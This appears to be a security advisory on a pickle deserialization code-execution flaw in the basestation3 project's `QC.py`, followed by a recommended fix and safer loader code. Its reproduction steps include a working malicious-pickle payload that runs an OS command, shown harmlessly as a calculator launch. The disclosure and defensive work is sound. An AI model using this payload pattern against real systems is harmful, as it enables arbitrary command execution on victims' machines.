### Key Information Summary

#### Vulnerability Description

- **Vulnerability Type**: Remote Code Execution (RCE) via unsafe deserialization
- **Affected File**: `QC.py`
- **Affected Function**: `load_qc_pickl()`
- **Issue**: The function uses `pickle.load()` to deserialize data without validating or sanitizing the input, allowing attackers to execute arbitrary code by providing a malicious pickle file.

#### Impact

- **Arbitrary Code Execution**
- **Remote System Compromise** if the attacker can control `qc_file`

#### Reproduction Steps

1. Clone the repository: `git clone https://github.com/iop-api-uw/basestation3`
2. Navigate to the `basestation3` directory: `cd basestation3`
3. Create a malicious `qc.pkl` file:

   ```python
   import pickle
   import os

   class Evil:
       def __reduce__(self):
           return (os.system, ("gnome-calculator",))  # Replace with any OS command

   payload = pickle.dumps(Evil())
   with open("qc.pkl", "wb") as f:
       f.write(payload)
   ```

4. Create and run `exploit.py`:

   ```python
   from QC import load_qc_pickl

   load_qc_pickl("/root/CW/qc.pkl")
   ```

5. Observe the calculator opening, confirming arbitrary command execution.

#### Recommended Fix

- Avoid using `pickle` to load untrusted data.
- If serialization/deserialization is necessary, use secure alternatives such as `json.load()` or a custom binary format with proper validation.
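
One way to apply the recommended fix, as an added example that is not code from the basestation3 project: a JSON loader with shape validation, plus a reader for existing pickle files that refuses every global lookup (a technique beyond the page's recommendation, included only for migrating old files). The function names and the schema (variable name mapped to a list of integer QC flags) are assumptions, as is the constructed sample data.

```python
import io
import json
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Refuse every global lookup, so no importable callable is ever resolved.

    Dicts, lists, strings and numbers have their own opcodes and still load;
    a __reduce__ payload needs find_class() and is rejected before any call.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def load_legacy_qc(data: bytes):
    """One-off reader for old pickles that hold only builtin containers."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


def validate_qc(obj):
    """Assumed schema (hypothetical): {variable name: [integer QC flags]}."""
    if not isinstance(obj, dict):
        raise ValueError("QC data must be an object")
    for name, flags in obj.items():
        if not isinstance(name, str) or not isinstance(flags, list):
            raise ValueError(f"bad entry {name!r}")
        # bool is a subclass of int, so exclude it explicitly
        if any(type(f) is not int for f in flags):
            raise ValueError(f"non-integer flag in {name!r}")
    return obj


def load_qc_json(text: str):
    """Replacement loader: JSON parsing cannot invoke code; then check shape."""
    return validate_qc(json.loads(text))


if __name__ == "__main__":
    sample = {"temperature": [0, 0, 4], "salinity": [0, 1, 0]}  # constructed
    migrated = validate_qc(load_legacy_qc(pickle.dumps(sample)))
    print(load_qc_json(json.dumps(migrated)) == sample)
```

If the real QC structure contains types that pickle resolves through globals (for example NumPy arrays), `load_legacy_qc` will reject those files, and the data needs an explicit conversion step in a trusted environment instead.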